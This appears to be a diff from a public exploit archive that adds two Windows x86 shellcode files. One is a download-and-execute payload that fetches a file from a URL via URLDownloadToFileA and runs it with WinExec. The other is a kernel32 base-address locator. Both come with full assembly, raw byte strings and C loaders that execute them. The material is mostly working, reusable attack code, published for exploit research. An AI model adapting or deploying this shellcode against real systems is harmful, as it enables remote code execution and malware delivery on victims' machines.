50711,shellcodes/windows_x86/50711.asm,"Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86

1 id file description date author type platform
1043 50368 shellcodes/windows_x86/50368.c Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86
1044 50369 shellcodes/windows_x86/50369.c Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86
1045 50384 shellcodes/windows_x86/50384.c Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86
1046 50710 shellcodes/windows_x86/50710.asm Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes) 1970-01-01 Techryptic shellcode windows_x86
1047 50711 shellcodes/windows_x86/50711.asm Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes) 1970-01-01 Tarek Ahmed shellcode windows_x86

300
shellcodes/windows_x86/50710.asm Normal file
View file

@ -0,0 +1,300 @@
; Exploit Title: Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)
; Exploit Author: Techryptic (@Tech)
; Date: 2022-01-31
; Tested on: WIN7X86
; Shoutout to #848 Advanced Software Exploitation and DSU.
; Description:
; The shellcode works in three parts. The first part and API call is using the Kernel32.dll and calling both CreateProcessA and LoadLibraryA function. Moving onto the next API call, it utilizes the urlmon.dll and calls the URLDownloadToFileA function. The objective of this call is to download a file from our malicious URL. Finally, the third API call is using the WinExec function to run the command, which will run the file that was downloaded.
; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
; Feel free to change which file is being downloaded, and what command to run the file. For example, if set to download a .vbs script, you can use the command 'cscript shellcode.vbs'.
[BITS 32]
mainentrypoint:
call geteip
geteip:
pop edx ; EDX is now base for function
lea edx, [edx-5]
mov ebp, esp
sub esp, 1000h
; Locate kernel32.dll
push edx
mov ebx, 0x4b1ffe8e
call get_module_address
pop edx
; Build kernel32.dll API function pointer table
push ebp
push edx
mov ebp, eax
lea esi, [EDX + KERNEL32HASHTABLE]
lea edi, [EDX + KERNEL32FUNCTIONSTABLE]
call get_api_address
pop edx
pop ebp
; Call LoadLibaryA to get urlmon.dll into memory
push ebp
push edx
lea eax, [EDX + URLMON]
push eax
call [EDX + LoadLibraryA]
pop edx
pop ebp
; Build urlmon.dll API function pointer table
push ebp
push edx
mov ebp, eax
lea esi, [EDX + URLMONHASHTABLE]
lea edi, [EDX + URLMONFUNCTIONSTABLE]
call get_api_address
pop edx
pop ebp
; Call URLDownloadToFileA
; pCaller NULL, URL, FILENAME, 0, 0
push eax
push 0
push 0
lea edi, [EDX + URL]
lea esi, [EDX + FILENAME]
push esi
push edi
push 0
call eax
;and esp, 0xfffffff0; Using the WinExec API to call com
call geteip2
geteip2:
pop edx ; EDX is now base for function
lea edx, [edx-122] ; yes.
mov ebp, esp
sub esp, 1000h
; Locate kernel32.dll
push edx
mov ebx, 0x4b1ffe8e ; kernel32.dll module hash
call get_module_address ; Sets EAX to kernel32.<Location>
pop edx
; Build kernel32.dll API function pointer table
push ebp
push edx
mov ebp, eax
lea esi, [EDX + WINKERNEL32HASHTABLE]
lea edi, [EDX + WINKERNEL32FUNCTIONSTABLE]
call get_api_address ; sets EAX to kernel32.WinExec function.
pop edx
pop ebp
; call winexec api
lea esi, [EDX + CMD] ;change back to EXE
push 0x00
push esi
push dword [EDX + WINKERNEL32_WINEXEC]
pop eax
call eax
get_module_address:
;walk PEB find target module
cld
xor edi, edi
mov edi, [FS:0x30]
mov edi, [edi+0xC]
mov edi, [edi+0x14]
next_module_loop:
mov esi, [edi+0x28]
xor edx, edx
module_hash_loop:
lodsw
test al, al
jz end_module_hash_loop
cmp al, 0x41
jb end_hash_check
cmp al, 0x5A
ja end_hash_check
or al, 0x20
end_hash_check:
rol edx, 7
xor dl, al
jmp module_hash_loop
end_module_hash_loop:
cmp edx, ebx
mov eax, [edi+0x10]
mov edi, [edi]
jnz next_module_loop
ret
get_api_address:
mov edx, ebp
add edx, [edx+3Ch]
mov edx, [edx+78h]
add edx, ebp
mov ebx, [edx+20h]
add ebx, ebp
xor ecx, ecx
load_api_hash:
push edi
push esi
mov esi, [esi]
load_api_name:
mov edi, [ebx]
add edi, ebp
push edx
xor edx, edx
create_hash_loop:
rol edx, 7
xor dl, [edi]
inc edi
cmp byte [edi], 0
jnz create_hash_loop
xchg eax, edx
pop edx
cmp eax, esi
jz load_api_addy
add ebx, 4
inc ecx
cmp [edx+18h], ecx
jnz load_api_name
pop esi
pop edi
ret
load_api_addy:
pop esi
pop edi
lodsd
push esi
push ebx
mov ebx, ebp
mov esi, ebx
add ebx, [edx+24h]
lea eax, [ebx+ecx*2]
movzx eax, word [eax]
lea eax, [esi+eax*4]
add eax, [edx+1ch]
mov eax, [eax]
add eax, esi
stosd
pop ebx
pop esi
add ebx, 4
inc ecx
cmp dword [esi], 0FFFFh
jnz load_api_hash
ret
CMD:
db "cscript cats-dl.vbs", 0 ; Command that will run
FILENAME:
db "cats-dl.vbs", 0 ; Name of the file being written to disk
URL:
db "http://127.0.0.1:8080/cats.vbs", 0 ; Use a non-malicious file extension
URLMON:
db "urlmon.dll", 0
KERNEL32HASHTABLE:
dd 0x46318ac7 ; CreateProcessA
dd 0xc8ac8026 ; LoadLibraryA
dd 0xFFFF
KERNEL32FUNCTIONSTABLE:
CreateProcessA:
dd 0x00000001
LoadLibraryA:
dd 0x00000002
WINKERNEL32HASHTABLE:
dd 0xe8bf6dad ; WinExec
dd 0xFFFF ; make sure to end with this token
WINKERNEL32FUNCTIONSTABLE:
WINKERNEL32_WINEXEC dd 0x00000000
URLMONHASHTABLE:
dd 0xd95d2399 ; URLDownloadToFileA function
dd 0xFFFF
URLMONFUNCTIONSTABLE:
URLDownloadToFileA:
dd 0x00000003
[*]================================= POC =============================== [*]
#include <windows.h>
#include <stdio.h>
// nasm -f win32 shellcode.asm -o shellcode.o
// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
char shellcode[] =
"\xe8\x00\x00\x00\x00\x5a\x8d\x52\xfb\x89\xe5\x81\xec\x00\x10"
"\x00\x00\x52\xbb\x8e\xfe\x1f\x4b\xe8\x9d\x00\x00\x00\x5a\x55"
"\x52\x89\xc5\x8d\xb2\x9e\x01\x00\x00\x8d\xba\xaa\x01\x00\x00"
"\xe8\xbd\x00\x00\x00\x5a\x5d\x55\x52\x8d\x82\x93\x01\x00\x00"
"\x50\xff\x92\xae\x01\x00\x00\x5a\x5d\x55\x52\x89\xc5\x8d\xb2"
"\xbe\x01\x00\x00\x8d\xba\xc6\x01\x00\x00\xe8\x95\x00\x00\x00"
"\x5a\x5d\x50\x6a\x00\x6a\x00\x8d\xba\x74\x01\x00\x00\x8d\xb2"
"\x68\x01\x00\x00\x56\x57\x6a\x00\xff\xd0\xe8\x00\x00\x00\x00"
"\x5a\x8d\x52\x86\x89\xe5\x81\xec\x00\x10\x00\x00\x52\xbb\x8e"
"\xfe\x1f\x4b\xe8\x2a\x00\x00\x00\x5a\x55\x52\x89\xc5\x8d\xb2"
"\xb2\x01\x00\x00\x8d\xba\xba\x01\x00\x00\xe8\x4a\x00\x00\x00"
"\x5a\x5d\x8d\xb2\x54\x01\x00\x00\x6a\x00\x56\xff\xb2\xba\x01"
"\x00\x00\x58\xff\xd0\xfc\x31\xff\x64\x8b\x3d\x30\x00\x00\x00"
"\x8b\x7f\x0c\x8b\x7f\x14\x8b\x77\x28\x31\xd2\x66\xad\x84\xc0"
"\x74\x11\x3c\x41\x72\x06\x3c\x5a\x77\x02\x0c\x20\xc1\xc2\x07"
"\x30\xc2\xeb\xe9\x39\xda\x8b\x47\x10\x8b\x3f\x75\xdb\xc3\x89"
"\xea\x03\x52\x3c\x8b\x52\x78\x01\xea\x8b\x5a\x20\x01\xeb\x31"
"\xc9\x57\x56\x8b\x36\x8b\x3b\x01\xef\x52\x31\xd2\xc1\xc2\x07"
"\x32\x17\x47\x80\x3f\x00\x75\xf5\x92\x5a\x39\xf0\x74\x0c\x83"
"\xc3\x04\x41\x39\x4a\x18\x75\xdf\x5e\x5f\xc3\x5e\x5f\xad\x56"
"\x53\x89\xeb\x89\xde\x03\x5a\x24\x8d\x04\x4b\x0f\xb7\x00\x8d"
"\x04\x86\x03\x42\x1c\x8b\x00\x01\xf0\xab\x5b\x5e\x83\xc3\x04"
"\x41\x81\x3e\xff\xff\x00\x00\x75\xad\xc3\x63\x73\x63\x72\x69"
"\x70\x74\x20\x63\x61\x74\x73\x2d\x64\x6c\x2e\x76\x62\x73\x00"
"\x63\x61\x74\x73\x2d\x64\x6c\x2e\x76\x62\x73\x00\x68\x74\x74"
"\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x3a\x38"
"\x30\x38\x30\x2f\x63\x61\x74\x73\x2e\x76\x62\x73\x00\x75\x72"
"\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\xc7\x8a\x31\x46\x26\x80"
"\xac\xc8\xff\xff\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\xad"
"\x6d\xbf\xe8\xff\xff\x00\x00\x00\x00\x00\x00\x99\x23\x5d\xd9"
"\xff\xff\x00\x00\x03\x00\x00\x00";
int main(int argc, char **argv) {
HINSTANCE hInstLib = LoadLibrary(TEXT("user32.dll"));
int i = 0, len = 0, target_addy = 0, offset = 0x0;
void*stage = VirtualAlloc(0, 0x1000, 0x1000,0x40 );
printf("[*] Memory allocated: 0x%08x\n", stage);
len = sizeof(shellcode);
printf("[*] Size of Shellcode: %08x\n", len);
memmove(stage, shellcode, 0x1000);
printf("[*] Shellcode copied\n");
target_addy = (char*)stage + offset;
printf("[*] Adjusting offset: 0x%08x\n", target_addy);
__asm {
int 3
mov eax, target_addy
jmp eax
}
}

127
shellcodes/windows_x86/50711.asm Normal file
View file

@ -0,0 +1,127 @@
; Shellcode Title: Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)
; Description:
; This shellcode is a new method to find kernel32 base address by parsing .text section of memory to find a pointer to kernel32 API.
; Date: 1/26/2022
; Shellcode Author: Tarek Ahmed
; Tested on: Microsoft Windows 7, and 10
/*
MIT License
Copyright (c) 2022 Tarek Ahmed
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
xor eax, eax
cdq
pop eax ; get the return address of .text section where the call of exec happened.
push eax
sub esp, 0x8 ; Reserve space on stack for variables
xor ecx, ecx
checkFirstByte: ; This will start finding the first two bytes of the instruction mov dword ptr[!!!]
inc ecx
mov edx, dword ptr[eax+ecx]
cmp dl, 0xff
jne checkFirstByte
cmp byte ptr[eax+ecx+1], 0x15
jne checkFirstByte
jmp foundByte
foundByte:
mov bl, byte ptr [eax+ecx+5]
cmp bl, 0 ; make sure we don't step on next instruction
je foundPtr
jmp checkFirstByte
foundPtr:
xor ebx, ebx
mov ebx, dword ptr[eax + ecx + 2]
mov edi, [ebx]
shr edi, 28 ; We found pointer to an api, check if it start with 7 e.g. 0x7000000
cmp edi, 7
je foundPossibleAddr ; If it starts with 7, then we have a possible kernel32 address
jmp checkFirstByte
foundPossibleAddr:
mov ebx, [ebx]
xor edx, edx
mov dx, 0x1001
add edx, 0xefff
findMZ:
sub ebx, edx ; we need to subtract 0x10000 to get the base
mov bx, dx
mov ax, [ebx]
cmp ax, 0x5a4d ; Check if it's a PE file which starts with "MZ"
jne findMZ ; If not, then subtract 0x10000 again to go one more page down.
mov edi, [ebx + 0x3c] ; Finally we found a possible DLL file, we need to parse it now.
add edi, ebx
mov edi, [edi + 0x78]
add edi, ebx
mov edi, [edi + 0xc]
add edi, ebx
add edi, 4
xor eax, eax
push eax
push 0x6c6c642e ; .dll
push 0x32334c45 ; ELE32
mov esi, esp ; We don't need the whole name, just ELE32.dll
checkKernel :
mov edx, ecx
mov ecx, 8
cld
repe cmpsb
cmp ecx, 0
jne checkFirstByte ; If we pass this check then we found our kernel32 base
*/
#include <windows.h>
#include <iostream>
#include <stdlib.h>
#include <stdio.h>
unsigned char code[] = "\x31\xC0\x99\x58\x50\x83\xEC\x08\x31\xC9\x41\x8B\x14\x08\x80\xFA\xFF\x75\xF7\x80\x7C\x08\x01\x15\x75\xF0\xEB\x00\x8A\x5C\x08\x05\x80\xFB\x00\x74\x02\xEB\xE3\x31\xDB\x8B\x5C\x08\x02\x8B\x3B\xC1\xEF\x1C\x83\xFF\x07\x74\x02\xEB\xD1\x8B\x1B\x31\xD2\x66\xBA\x01\x10\x81\xC2\xFF\xEF\x00\x00\x29\xD3\x66\x89\xD3\x66\x8B\x03\x66\x3D\x4D\x5A\x75\xF2\x8B\x7B\x3C\x01\xDF\x8B\x7F\x78\x01\xDF\x8B\x7F\x0C\x01\xDF\x83\xC7\x04\x31\xC0\x50\x68\x2E\x64\x6C\x6C\x68\x45\x4C\x33\x32\x89\xE6\x89\xCA\xB9\x08\x00\x00\x00\xFC\xF3\xA6\x83\xF9\x00\x75\x85";
int main()
{
void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, code, sizeof(code));
((void(*)())exec)();
return 0;
}